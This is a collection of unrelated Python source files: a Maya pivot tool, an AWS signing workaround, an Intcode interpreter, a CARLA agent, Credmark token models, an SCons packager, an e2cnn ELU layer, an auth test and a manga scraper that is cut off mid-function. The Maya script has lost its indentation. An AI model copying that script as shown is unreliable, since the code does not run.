# translation on ones. Eventually I'd like to make it a bit smarter about how it
# bakes.
#
# ____________
# - -/__ Usage __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#
# Run the UI. Select a node whose pivot you'd like to change, and press Edit
# Pivot. Your selection with change to handle, position this where you'd like the
# pivot to be and press Return. Or press ESC or select something else to cancel.
#
# _________
# - -/__ Ui __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#
# [Edit Pivot] : Creates a temporary node to positon for the new pivot.
# [Reset Pivot] : Rest the rotation pivot to zero.
#
# ___________________
# - -/__ Requirements __/- - - - - - - - - - - - - - - - - - - - - - - - - -
#
# This script requires the ml_utilities module, which can be downloaded here:
# https://raw.githubusercontent.com/morganloomis/ml_tools/master/ml_utilities.py
#
# __________
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - /_ Enjoy! _/- - -
__author__ = 'Morgan Loomis'
__license__ = 'MIT'
__revision__ = 4
__category__ = 'animation'
try:
from PySide2 import QtGui, QtCore
import shiboken2 as shiboken
except ImportError:
from PySide import QtGui, QtCore
import shiboken
import maya.OpenMaya as om
import maya.OpenMayaUI as mui
import maya.cmds as mc
try:
import ml_utilities as utl
utl.upToDateCheck(32)
except ImportError:
result = mc.confirmDialog( title='Module Not Found',
message='This tool requires the ml_utilities module. Once downloaded you will need to restart Maya.',
button=['Download Module','Cancel'],
defaultButton='Cancel', cancelButton='Cancel', dismissString='Cancel' )
if result == 'Download Module':
mc.showHelp('http://morganloomis.com/tool/ml_utilities/',absolute=True)
#get maya window as qt object
main_window_ptr = mui.MQtUtil.mainWindow()
qt_maya_window = shiboken.wrapInstance(long(main_window_ptr), QtCore.QObject)
def ui():
'''
user interface for ml_pivot
'''
with utl.MlUi('ml_pivot', 'Change Pivot', width=400, height=150, info='''Select an animated control whose pivot you'd like to change, and press Edit Pivot.
Your selection with change to handle, position this where you'd like the pivot to be
and press Return. Or press ESC or deselect to cancel.''') as win:
win.buttonWithPopup(label='Edit Pivot', command=edit_pivot, annotation='Creates a temporary node to positon for the new pivot.', shelfLabel='pivot', shelfIcon='defaultTwoStackedLayout')
win.buttonWithPopup(label='Reset Pivot', command=reset_pivot, annotation='Rest the rotation pivot to zero.', shelfLabel='reset', shelfIcon='defaultTwoStackedLayout')
def edit_pivot(*args):
context = EditPivotContext()
context.editPivot()
class PivotKeypressFilter(QtCore.QObject):
'''
A qt event filter to catch the enter or escape keypresses.
'''
def __init__(self, enterCommand, escapeCommand):
self.enterCommand = enterCommand
self.escapeCommand = escapeCommand
super(PivotKeypressFilter, self).__init__()
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.KeyPress:
if event.key() == QtCore.Qt.Key_Return:
with utl.UndoChunk(force=True):
self.enterCommand()
if event.key() == QtCore.Qt.Key_Escape:
self.escapeCommand()
qt_maya_window.removeEventFilter(self)
return False
class EditPivotContext(object):
def __init__(self):
self.node = None
self.pivotHandle = None
self.scriptJob = None
self.keypressFilter = PivotKeypressFilter(self.bakePivot, self.cleanup)
def editPivot(self, *args):
sel = mc.ls(sl=True)
if not sel:
om.MGlobal.displayWarning('Nothing selected.')
return
if len(sel) > 1:
om.MGlobal.displayWarning('Only works on one node at a time.')
return
if mc.attributeQuery('ml_pivot_handle', exists=True, node=sel[0]):
#we have a pivot handle selected
return
self.node = sel[0]
if is_pivot_connected(sel[0]):
driverAttr = pivot_driver_attr(sel[0])
if driverAttr:
self.editPivotDriver(driverAttr)
else:
om.MGlobal.displayWarning('Pivot attribute is connected, unable to edit.')
return
self.editPivotHandle()
def editPivotDriver(self, driver):
self.pivotDriver = driver
#get driver range
node,attr = driver.split('.',1)
value = mc.getAttr(driver)
minValue = mc.attributeQuery(attr, node=node, minimum=True)[0]
maxValue = mc.attributeQuery(attr, node=node, maximum=True)[0]
#create a ui with a slider
self.pivotDriverWindow = 'ml_pivot_editPivotDriverUI'
if mc.window(self.pivotDriverWindow, exists=True):
mc.deleteUI(self.pivotDriverWindow)
window = mc.window(self.pivotDriverWindow, width=1, height=1)
mc.columnLayout()
self.floatSlider = mc.floatSliderButtonGrp(label=attr,
field=True,
value=value,
buttonLabel='Bake',
minValue=minValue,
maxValue=maxValue,
buttonCommand=self.doEditPivotDriver )
mc.showWindow( window )
mc.window(self.pivotDriverWindow, edit=True, width=1, height=1)
def doEditPivotDriver(self, *args):
newValue = mc.floatSliderButtonGrp(self.floatSlider, query=True, value=True)
try:
mc.deleteUI(self.pivotDriverWindow)
except:
pass
currentValue = mc.getAttr(self.pivotDriver)
if newValue == currentValue:
return
oldRP = mc.getAttr(self.node+'.rotatePivot')[0]
mc.setAttr(self.pivotDriver, newValue)
newRP = mc.getAttr(self.node+'.rotatePivot')[0]
mc.setAttr(self.pivotDriver, currentValue)
parentPosition = mc.group(em=True)
offsetPosition = mc.group(em=True)
offsetPosition = mc.parent(offsetPosition, parentPosition)[0]
mc.setAttr(offsetPosition+'.translate', newRP[0]-oldRP[0], newRP[1]-oldRP[1], newRP[2]-oldRP[2])
mc.delete(mc.parentConstraint(self.node, parentPosition))
utl.matchBake(source=[self.node], destination=[parentPosition], bakeOnOnes=True, maintainOffset=False, preserveTangentWeight=False)
mc.cutKey(self.pivotDriver)
mc.setAttr(self.pivotDriver, newValue)
mc.refresh()
utl.matchBake(source=[offsetPosition], destination=[self.node], bakeOnOnes=True, maintainOffset=False, preserveTangentWeight=False, rotate=False)
mc.delete(parentPosition)
def editPivotHandle(self):
qt_maya_window.installEventFilter(self.keypressFilter)
#create transform
self.pivotHandle = mc.group(em=True, name='Adjust_Pivot')
mc.setAttr(self.pivotHandle+'.rotate', lock=True)
mc.setAttr(self.pivotHandle+'.rx', keyable=False)
mc.setAttr(self.pivotHandle+'.ry', keyable=False)
mc.setAttr(self.pivotHandle+'.rz', keyable=False)
mc.setAttr(self.pivotHandle+'.scale', lock=True)
mc.setAttr(self.pivotHandle+'.sx', keyable=False)
mc.setAttr(self.pivotHandle+'.sy', keyable=False)
mc.setAttr(self.pivotHandle+'.sz', keyable=False)
mc.setAttr(self.pivotHandle+'.visibility', lock=True, keyable=False)
mc.setAttr(self.pivotHandle+'.displayHandle', True)
self.pivotHandle = mc.parent(self.pivotHandle, self.node)[0]
mc.addAttr(self.pivotHandle, ln='ml_pivot_handle', at='bool', keyable=False)
#set initial position
mc.setAttr(self.pivotHandle+'.translate', *mc.getAttr(self.node+'.rotatePivot')[0])
#lock it so you don't delete it or something.
mc.lockNode(self.pivotHandle, lock=True)
self.scriptJob = mc.scriptJob(event=['SelectionChanged', self.cleanup], runOnce=True)
mc.setToolTo('Move')
mc.inViewMessage( amg='After moving the pivot, press <hl>Return</hl> to bake or <hl>Esc</hl> to cancel.', pos='midCenterTop', fade=True, fadeStayTime=4000, dragKill=True)
def bakePivot(self):
if not mc.objExists(self.pivotHandle) or not mc.objExists(self.node):
self.cleanup()
return
newPivot = mc.getAttr(self.pivotHandle+'.translate')[0]
if newPivot == mc.getAttr(self.node+'.rotatePivot')[0]:
self.cleanup()
return
if not mc.keyframe(self.node, attribute=('tx','ty','tz','rx','ry','rz'), query=True, name=True):
mc.setAttr(self.node+'.rotatePivot', *newPivot)
self.cleanup()
return
tempPosition = mc.group(em=True)
mc.delete(mc.parentConstraint(self.pivotHandle, tempPosition))
utl.matchBake(source=[self.node], destination=[tempPosition], bakeOnOnes=True, maintainOffset=True, preserveTangentWeight=False, rotate=False)
mc.setAttr(self.node+'.rotatePivot', *newPivot)
utl.matchBake(source=[tempPosition], destination=[self.node], bakeOnOnes=True, maintainOffset=False, preserveTangentWeight=False, rotate=False)
mc.delete(tempPosition)
mc.select(self.node)
self.cleanup()
#end context
try:
qt_maya_window.removeEventFilter(self.keypressFilter)
except:
pass
def cleanup(self):
'''
Clean up the mess we made.
'''
try:
mc.lockNode(self.pivotHandle, lock=False)
mc.delete(self.pivotHandle)
except: pass
try:
if mc.scriptJob(exists=self.scriptJob):
mc.scriptJob(kill=self.scriptJob, force=True)
except: pass
pivotHandles = mc.ls('*.ml_pivot_handle', o=True)
if pivotHandles:
for each in pivotHandles:
mc.lockNode(each, lock=False)
mc.delete(each)
def pivot_driver_attr(node):
'''
Start with supporting pivots driven by remap value nodes, more support in the future as requested.
'''
#rpSrc = mc.listConnections(node+'.rotatePivot', source=True, destination=False, plugs=True)
#if rpSrc and rpSrc[0].endswith('.translate') and mc.getAttr(rpSrc[0], keyable=True):
#return rpSrc[0]
for each in ('rotatePivotX', 'rotatePivotY', 'rotatePivotZ'):
src = mc.listConnections(node+'.'+each, source=True, destination=False)
if not src:
continue
srcType = mc.nodeType(src[0])
if srcType == 'remapValue':
src = mc.listConnections(src[0]+'.inputValue', source=True, destination=False, plugs=True)
if src and mc.getAttr(src[0], keyable=True) and not mc.getAttr(src[0], lock=True):
return src[0]
return None
def is_pivot_connected(node):
for each in ('rotatePivot', 'rotatePivotX', 'rotatePivotY', 'rotatePivotZ'):
if mc.listConnections(node+'.'+each, source=True, destination=False):
return True
return False
def reset_pivot(*args):
sel = mc.ls(sl=True)
if not sel:
om.MGlobal.displayWarning('Nothing selected.')
return
if len(sel) > 1:
om.MGlobal.displayWarning('Only works on one node at a time.')
return
node = sel[0]
driver = None
driver_value = None
driver_default = None
if is_pivot_connected(node):
driver = pivot_driver_attr(node)
if driver:
dNode,dAttr = driver.split('.',1)
driver_value = mc.getAttr(driver)
driver_default = mc.attributeQuery(dAttr, node=dNode, listDefault=True)[0]
if driver_default == driver_value:
return
else:
om.MGlobal.displayWarning('Pivot attribute is connected, unable to edit.')
return
if not driver:
pivotPosition = mc.getAttr(node+'.rotatePivot')[0]
if pivotPosition == (0.0,0.0,0.0):
return
tempPosition = mc.group(em=True)
tempPivot = mc.group(em=True)
tempPivot = mc.parent(tempPivot, node)[0]
if driver:
mc.setAttr(driver, driver_default)
newRP = mc.getAttr(node+'.rotatePivot')[0]
mc.setAttr(driver, driver_value)
mc.setAttr(tempPivot+'.translate', *newRP)
else:
mc.setAttr(tempPivot+'.translate', 0,0,0)
mc.setAttr(tempPivot+'.rotate', 0,0,0)
utl.matchBake(source=[tempPivot], destination=[tempPosition], bakeOnOnes=True, maintainOffset=False, preserveTangentWeight=False, rotate=False)
if driver:
mc.setAttr(driver, driver_default)
else:
mc.setAttr(node+'.rotatePivot', 0,0,0)
mc.refresh()
utl.matchBake(source=[tempPosition], destination=[node], bakeOnOnes=True, maintainOffset=False, preserveTangentWeight=False, rotate=False)
mc.delete(tempPosition,tempPivot)
mc.select(node)
if __name__ == '__main__':
ui()
# ______________________
# - -/__ Revision History __/- - - - - - - - - - - - - - - - - - - - - - - -
#
# Revision 1: 2016-06-21 : First publish.
#
# Revision 2: 2017-06-26 : update for pySide2, maya 2017
#
# Revision 3: 2017-07-17 : initial support for attribute driven pivots
#
# Revision 4: 2018-02-17 : Updating license to MIT.
|
the-stack_106_12905
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from requests_aws4auth import AWS4Auth
class AWS4AuthNotUnicode(AWS4Auth):
"""
This is a workaround for
https://github.com/sam-washington/requests-aws4auth/issues/24
These are similar issues:
https://github.com/shazow/urllib3/issues/855
https://github.com/kennethreitz/requests/issues/3177
"""
def __call__(self, req):
req = super(AWS4AuthNotUnicode, self).__call__(req)
req.headers = {
name if isinstance(name, bytes) else name.encode('ascii'):
value if isinstance(value, bytes) else value.encode('ascii')
for name, value in req.headers.items()
}
return req
|
the-stack_106_12907
|
import sys
import json
class Pc:
def __init__(self):
self.read_input()
self.instruction_pointer = 0
self.noun = None
self.verb = None
self.result = None
def run(self):
if self.noun != None:
self.write(1, self.noun)
if self.verb != None:
self.write(2, self.verb)
while self.instruction_pointer < self.size:
self.fetch()
if self.opcode == 99:
self.result = self.read(0)
return self.result
elif self.opcode == 1:
self.write(self.output, (self.param_a + self.param_b))
elif self.opcode == 2:
self.write(self.output, (self.param_a * self.param_b))
else:
print("bad :(")
sys.exit(255)
def read_input(self):
self.mem = [
int(num)
for line in sys.stdin
for num in line.strip().split(',')
]
self.size = len(self.mem)
self.save_state()
def read(self, address):
return int(self.mem[address])
def deref(self, address):
return self.mem[self.read(address)]
def write(self, address, value):
self.mem[address] = value
def fetch(self):
self.opcode = self.read(self.instruction_pointer)
self.param_a = self.deref(self.instruction_pointer + 1)
self.param_b = self.deref(self.instruction_pointer + 2)
self.output = self.read(self.instruction_pointer + 3)
self.instruction_pointer += 4
def reset(self):
self.instruction_pointer = 0
self.result = None
self.restore_state()
def save_state(self):
self.state = [address for address in self.mem]
def restore_state(self):
self.mem = [address for address in self.state]
def __str__(self):
return json.dumps({
"noun": self.noun,
"verb": self.verb,
"result": self.result
})
|
the-stack_106_12909
|
#!/usr/bin/env python
# Copyright (c) 2018 Intel Labs.
# authors: German Ros ([email protected])
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
""" This module implements an agent that roams around a track following random
waypoints and avoiding other vehicles.
The agent also responds to traffic lights. """
from enum import Enum
import carla
from agents.tools.misc import is_within_distance_ahead, compute_magnitude_angle
class AgentState(Enum):
"""
AGENT_STATE represents the possible states of a roaming agent
"""
NAVIGATING = 1
BLOCKED_BY_VEHICLE = 2
BLOCKED_RED_LIGHT = 3
class Agent(object):
"""
Base class to define agents in CARLA
"""
def __init__(self, vehicle):
"""
:param vehicle: actor to apply to local planner logic onto
"""
self._vehicle = vehicle
self._world = self._vehicle.get_world()
self._map = self._vehicle.get_world().get_map()
self._last_traffic_light = None
def run_step(self, debug=False):
"""
Execute one step of navigation.
:return: control
"""
control = carla.VehicleControl()
control.steer = 0.0
control.throttle = 0.0
control.brake = 0.0
control.hand_brake = False
control.manual_gear_shift = False
return control
def _is_light_red(self, lights_list):
"""
Method to check if there is a red light affecting us. This version of
the method is compatible with both European and US style traffic lights.
:param lights_list: list containing TrafficLight objects
:return: a tuple given by (bool_flag, traffic_light), where
- bool_flag is True if there is a traffic light in RED
affecting us and False otherwise
- traffic_light is the object itself or None if there is no
red traffic light affecting us
"""
if self._map.name == 'Town01' or self._map.name == 'Town02':
return self._is_light_red_europe_style(lights_list)
else:
return self._is_light_red_us_style(lights_list)
def _is_light_red_europe_style(self, lights_list):
"""
This method is specialized to check European style traffic lights.
:param lights_list: list containing TrafficLight objects
:return: a tuple given by (bool_flag, traffic_light), where
- bool_flag is True if there is a traffic light in RED
affecting us and False otherwise
- traffic_light is the object itself or None if there is no
red traffic light affecting us
"""
ego_vehicle_location = self._vehicle.get_location()
ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
for traffic_light in lights_list:
object_waypoint = self._map.get_waypoint(traffic_light.get_location())
if object_waypoint.road_id != ego_vehicle_waypoint.road_id or \
object_waypoint.lane_id != ego_vehicle_waypoint.lane_id:
continue
loc = traffic_light.get_location()
if is_within_distance_ahead(loc, ego_vehicle_location,
self._vehicle.get_transform().rotation.yaw,
self._proximity_threshold):
if traffic_light.state == carla.libcarla.TrafficLightState.Red:
return (True, traffic_light)
return (False, None)
def _is_light_red_us_style(self, lights_list, debug=False):
"""
This method is specialized to check US style traffic lights.
:param lights_list: list containing TrafficLight objects
:return: a tuple given by (bool_flag, traffic_light), where
- bool_flag is True if there is a traffic light in RED
affecting us and False otherwise
- traffic_light is the object itself or None if there is no
red traffic light affecting us
"""
ego_vehicle_location = self._vehicle.get_location()
ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
if ego_vehicle_waypoint.is_intersection:
# It is too late. Do not block the intersection! Keep going!
return (False, None)
if self._local_planner._target_waypoint is not None:
if self._local_planner._target_waypoint.is_intersection:
potential_lights = []
min_angle = 180.0
sel_magnitude = 0.0
sel_traffic_light = None
for traffic_light in lights_list:
loc = traffic_light.get_location()
magnitude, angle = compute_magnitude_angle(loc,
ego_vehicle_location,
self._vehicle.get_transform().rotation.yaw)
if magnitude < 80.0 and angle < min(25.0, min_angle):
sel_magnitude = magnitude
sel_traffic_light = traffic_light
min_angle = angle
if sel_traffic_light is not None:
if debug:
print('=== Magnitude = {} | Angle = {} | ID = {}'.format(sel_magnitude, min_angle, sel_traffic_light.id))
if self._last_traffic_light is None:
self._last_traffic_light = sel_traffic_light
if self._last_traffic_light.state == carla.libcarla.TrafficLightState.Red:
return (True, self._last_traffic_light)
else:
self._last_traffic_light = None
return (False, None)
def _is_vehicle_hazard(self, vehicle_list):
"""
Check if a given vehicle is an obstacle in our way. To this end we take
into account the road and lane the target vehicle is on and run a
geometry test to check if the target vehicle is under a certain distance
in front of our ego vehicle.
WARNING: This method is an approximation that could fail for very large
vehicles, which center is actually on a different lane but their
extension falls within the ego vehicle lane.
:param vehicle_list: list of potential obstacle to check
:return: a tuple given by (bool_flag, vehicle), where
- bool_flag is True if there is a vehicle ahead blocking us
and False otherwise
- vehicle is the blocker object itself
"""
ego_vehicle_location = self._vehicle.get_location()
ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
for target_vehicle in vehicle_list:
# do not account for the ego vehicle
if target_vehicle.id == self._vehicle.id:
continue
# if the object is not in our lane it's not an obstacle
target_vehicle_waypoint = self._map.get_waypoint(target_vehicle.get_location())
if target_vehicle_waypoint.road_id != ego_vehicle_waypoint.road_id or \
target_vehicle_waypoint.lane_id != ego_vehicle_waypoint.lane_id:
continue
loc = target_vehicle.get_location()
if is_within_distance_ahead(loc, ego_vehicle_location,
self._vehicle.get_transform().rotation.yaw,
self._proximity_threshold):
return (True, target_vehicle)
return (False, None)
def emergency_stop(self):
"""
Send an emergency stop command to the vehicle
:return:
"""
control = carla.VehicleControl()
control.steer = 0.0
control.throttle = 0.0
control.brake = 1.0
control.hand_brake = False
return control
|
the-stack_106_12910
|
# pylint: disable=locally-disabled, unused-import
from typing import List
from credmark.cmf.model import Model
from credmark.cmf.model.errors import ModelDataError
from credmark.cmf.types import (
Token,
Price,
Contract,
Accounts,
Contracts,
)
from credmark.dto import DTO, IterableListGenericDTO
@Model.describe(
slug="token.info",
version="1.0",
display_name="Token Information",
developer="Credmark",
input=Token,
output=Token
)
class TokenInfoModel(Model):
"""
Return token's information
"""
def run(self, input: Token) -> Token:
return input.info
@Model.describe(slug='token.holders',
version='1.0',
display_name='Token Holders',
description='The number of holders of a Token',
input=Token,
output=dict)
class TokenHolders(Model):
def run(self, _input: Token) -> dict:
# TODO: Get Holders
return {"result": 0}
@Model.describe(slug='token.swap-pools',
version='1.0',
display_name='Swap Pools for Token',
description='All swap pools available for the current Token',
input=Token,
output=Contracts)
class TokenSwapPools(Model):
def run(self, input: Token) -> Contracts:
response = Contracts(contracts=[])
response.contracts.extend(Contracts(**self.context.models.uniswap_v3.get_pools(input)))
response.contracts.extend(Contracts(**self.context.models.uniswap_v2.get_pools(input)))
response.contracts.extend(Contracts(**self.context.models.sushiswap.get_pools(input)))
return response
@Model.describe(slug='token.swap-pool-volume',
version='1.0',
display_name='Token Volume',
description='The current volume for a swap pool',
input=Contract,
output=dict)
class TokenSwapPoolVolume(Model):
def run(self, input: Token) -> dict:
# TODO: Get All Credmark Supported swap Pools for a token
return {"result": 0}
@Model.describe(slug='token.overall-volume',
version='1.0',
display_name='Token Volume',
description='The Current Credmark Supported trading volume algorithm',
input=Token,
output=dict)
class TokenVolume(Model):
def run(self, input) -> dict:
# TODO: Get Overall Volume
return {"result": 0}
class CategorizedSupplyRequest(IterableListGenericDTO):
class CategorizedSupplyCategory(DTO):
accounts: Accounts
categoryName: str
categoryType: str = ''
circulating: bool = False
categories: List[CategorizedSupplyCategory]
_iterator: str = 'categories'
token: Token
class CategorizedSupplyResponse(CategorizedSupplyRequest):
class CategorizedSupplyCategory(CategorizedSupplyRequest.CategorizedSupplyCategory):
amountScaled: float = 0.0
valueUsd: float = 0.0
categories: List[CategorizedSupplyCategory]
_iterator: str = 'categories'
circulatingSupplyScaled: float = 0.0
circulatingSupplyUsd: float = 0.0
@Model.describe(slug='token.categorized-supply',
version='1.0',
display_name='Token Categorized Supply',
description='The categorized supply for a token',
input=CategorizedSupplyRequest,
output=CategorizedSupplyResponse)
class TokenCirculatingSupply(Model):
def run(self, input: CategorizedSupplyRequest) -> CategorizedSupplyResponse:
response = CategorizedSupplyResponse(**input.dict())
total_supply_scaled = input.token.scaled(input.token.total_supply)
token_price = Price(**self.context.models.token.price(input.token))
if token_price is None:
raise ModelDataError(f"No Price for {response.token}")
for c in response.categories:
for account in c.accounts:
bal = response.token.functions.balanceOf(account.address).call()
c.amountScaled += response.token.scaled(bal)
if token_price is not None and token_price.price is not None:
c.valueUsd = c.amountScaled * token_price.price
response.categories.append(CategorizedSupplyResponse.CategorizedSupplyCategory(
accounts=Accounts(accounts=[]),
categoryName='uncategorized',
categoryType='uncategorized',
circulating=True,
amountScaled=total_supply_scaled - sum([c.amountScaled for c in response.categories])
))
response.circulatingSupplyScaled = sum(
[c.amountScaled for c in response.categories if c.circulating])
if isinstance(token_price.price, float):
if isinstance(response.circulatingSupplyScaled, float):
response.circulatingSupplyUsd = response.circulatingSupplyScaled * token_price.price
return response
|
the-stack_106_12913
|
"""SCons.Tool.Packaging.zip
The zip SRC packager.
"""
#
# Copyright (c) 2001 - 2019 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/packaging/zip.py 72ae09dc35ac2626f8ff711d8c4b30b6138e08e3 2019-08-08 14:50:06 bdeegan"
from SCons.Tool.packaging import stripinstallbuilder, putintopackageroot
def package(env, target, source, PACKAGEROOT, **kw):
bld = env['BUILDERS']['Zip']
bld.set_suffix('.zip')
target, source = stripinstallbuilder(target, source, env)
target, source = putintopackageroot(target, source, env, PACKAGEROOT)
return bld(env, target, source)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
the-stack_106_12914
|
from e2cnn.gspaces import *
from e2cnn.nn import FieldType
from e2cnn.nn import GeometricTensor
from ..equivariant_module import EquivariantModule
import torch
import torch.nn.functional as F
from typing import List, Tuple, Any
import numpy as np
__all__ = ["ELU"]
class ELU(EquivariantModule):
def __init__(self, in_type: FieldType, alpha: float = 1.0, inplace: bool = False):
r"""
Module that implements a pointwise ELU to every channel independently.
The input representation is preserved by this operation and, therefore, it equals the output
representation.
Only representations supporting pointwise non-linearities are accepted as input field type.
Args:
in_type (FieldType): the input field type
alpha (float): the :math:`\alpha` value for the ELU formulation. Default: 1.0
inplace (bool, optional): can optionally do the operation in-place. Default: ``False``
"""
assert isinstance(in_type.gspace, GeneralOnR2)
super(ELU, self).__init__()
for r in in_type.representations:
assert 'pointwise' in r.supported_nonlinearities, \
'Error! Representation "{}" does not support "pointwise" non-linearity'.format(r.name)
self.space = in_type.gspace
self.in_type = in_type
self.alpha = alpha
# the representation in input is preserved
self.out_type = in_type
self._inplace = inplace
def forward(self, input: GeometricTensor) -> GeometricTensor:
r"""
Applies ELU function on the input fields
Args:
input (GeometricTensor): the input feature map
Returns:
the resulting feature map after elu has been applied
"""
assert input.type == self.in_type
return GeometricTensor(F.elu(input.tensor, alpha=self.alpha, inplace=self._inplace), self.out_type)
def evaluate_output_shape(self, input_shape: Tuple[int, int, int, int]) -> Tuple[int, int, int, int]:
assert len(input_shape) == 4
assert input_shape[1] == self.in_type.size
b, c, hi, wi = input_shape
return b, self.out_type.size, hi, wi
def check_equivariance(self, atol: float = 1e-6, rtol: float = 1e-5) -> List[Tuple[Any, float]]:
c = self.in_type.size
x = torch.randn(3, c, 10, 10)
x = GeometricTensor(x, self.in_type)
errors = []
for el in self.space.testing_elements:
out1 = self(x).transform_fibers(el)
out2 = self(x.transform_fibers(el))
errs = (out1.tensor - out2.tensor).detach().numpy()
errs = np.abs(errs).reshape(-1)
print(el, errs.max(), errs.mean(), errs.var())
assert torch.allclose(out1.tensor, out2.tensor, atol=atol, rtol=rtol), \
'The error found during equivariance check with element "{}" is too high: max = {}, mean = {} var ={}' \
.format(el, errs.max(), errs.mean(), errs.var())
errors.append((el, errs.mean()))
return errors
def extra_repr(self):
return 'alpha={}, inplace={}, type={}'.format(
self.alpha, self._inplace, self.in_type
)
def export(self):
r"""
Export this module to a normal PyTorch :class:`torch.nn.ELU` module and set to "eval" mode.
"""
self.eval()
return torch.nn.ELU(alpha=self.alpha, inplace=self._inplace)
|
the-stack_106_12917
|
from __future__ import absolute_import
from __future__ import unicode_literals
from datetime import datetime, timedelta
from django.test import TestCase
from casexml.apps.case.tests.util import check_xml_line_by_line
from corehq.apps.mobile_auth.utils import new_key_record, get_mobile_auth_payload
from dimagi.ext.jsonobject import HISTORICAL_DATETIME_FORMAT
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.users.models import CommCareUser
class MobileAuthTest(TestCase):
def setUp(self):
self.now = datetime.utcnow()
self.domain_name = 'test'
self.domain = create_domain(self.domain_name)
self.username = 'test-user'
self.password = 'awesome'
self.commcare_user = CommCareUser.create(self.domain_name, self.username, self.password)
self.user_id = self.commcare_user.get_id
def tearDown(self):
self.commcare_user.delete()
@staticmethod
def format_datetime_no_usec(dt):
# phone handler can't deal with microseconds
return dt.strftime(HISTORICAL_DATETIME_FORMAT)
def test_xml(self):
now_plus_30 = self.now + timedelta(days=30)
now_minus_30 = self.now - timedelta(days=30)
record = new_key_record(None, None, now=self.now)
xml = get_mobile_auth_payload([record], self.domain_name, now=self.now)
check_xml_line_by_line(self, xml, """
<OpenRosaResponse xmlns="http://openrosa.org/http/response">
<message nature="submit_success">Here are your keys!</message>
<auth_keys domain="{domain}" issued="{now}">
<key_record valid="{now}" expires="{now_plus_30}">
<uuid>{record.uuid}</uuid>
<key type="{record.type}">{record.key}</key>
</key_record>
</auth_keys>
</OpenRosaResponse>
""".format(
now=self.format_datetime_no_usec(self.now),
now_plus_30=self.format_datetime_no_usec(now_plus_30),
record=record,
domain=self.domain_name,
))
record = new_key_record(None, None, now=self.now, valid=now_minus_30)
xml = get_mobile_auth_payload([record], self.domain_name, now=self.now)
check_xml_line_by_line(self, xml, """
<OpenRosaResponse xmlns="http://openrosa.org/http/response">
<message nature="submit_success">Here are your keys!</message>
<auth_keys domain="{domain}" issued="{now}">
<key_record valid="{now_minus_30}" expires="{now_plus_30}">
<uuid>{record.uuid}</uuid>
<key type="{record.type}">{record.key}</key>
</key_record>
</auth_keys>
</OpenRosaResponse>
""".format(
now=self.format_datetime_no_usec(self.now),
now_plus_30=self.format_datetime_no_usec(now_plus_30),
now_minus_30=self.format_datetime_no_usec(now_minus_30),
record=record,
domain=self.domain_name,
))
|
the-stack_106_12920
|
#####################################################################
# All rights reserved to davekolian #
#####################################################################
import pymongo
from lxml import html
import requests
import time
# from requests_html import AsyncHTMLSession
import datetime
import sys
from configparser import ConfigParser
import asyncio
import nest_asyncio
nest_asyncio.apply()
lst_not_read_dicts = []
not_read = []
document_count = 1
# Functions which scrape the websites to find which chapters have been newly released
async def find_manga_mangakakalot(url):
await asyncio.sleep(1)
global not_read
global document_count
global error_urls
page = requests.get(url)
tree = html.fromstring(page.content)
manga = tree.xpath('//ul[@class="manga-info-text"]/li/h1/text()')
chap = tree.xpath('//div[@class="row"]/span/a/text()')
times = tree.xpath('//div[@class="row"]/span/text()')
imgs_srcs = tree.xpath('//div[@class="manga-info-pic"]/img/@src')
links = tree.xpath('//div[@class="row"]/span/a/@href')
if page.status_code == 200 and manga:
times = [times[i] for i in range(1, len(times), 2)]
# Cleaning the manga's name
manga_clean = str(manga)[2:-2]
if " " not in manga_clean:
manga_clean += " "
chap_clean = []
# Gets the exact Chapter number
for x in range(0, len(chap)):
start_chapter = chap[x].find("Chapter")
if ":" in chap[x]:
end_line = chap[x].find(":")
chap_clean.append(str(chap[x][start_chapter + 8:end_line]))
else:
chap_clean.append(str(chap[x][start_chapter + 8:]))
# Adding the required manga name and index num into the not_read array
for x in range(0, len(times)):
if "day" in times[x] or "days" in times[x]:
if int(str(times[x][0:1])) < 2:
not_read.append("s")
not_read.append(document_count)
document_count += 1
not_read.append(manga_clean)
break
elif "hour" in times[x] or "hours" in times[x]:
if int(str(times[x][0:2])) < 24:
not_read.append("s")
not_read.append(document_count)
document_count += 1
not_read.append(manga_clean)
break
elif "mins" in times[x] or "min" in times[x] or "minutes" in times[x] or "minute" in times[x]:
if int(str(times[x][0:1])) < 60:
not_read.append("s")
not_read.append(document_count)
document_count += 1
not_read.append(manga_clean)
break
# Adding the required chapters and their links into array form for MongoDB
list_of_chaps = []
list_of_chap_links = []
for x in range(0, len(times)):
if "day" in times[x] or "days" in times[x]:
if int(str(times[x][0:1])) < 2:
list_of_chaps.append(chap_clean[x])
list_of_chap_links.append(links[x])
elif "hour" in times[x] or "hours" in times[x]:
if int(str(times[x][0:2])) < 24:
list_of_chaps.append(chap_clean[x])
list_of_chap_links.append(links[x])
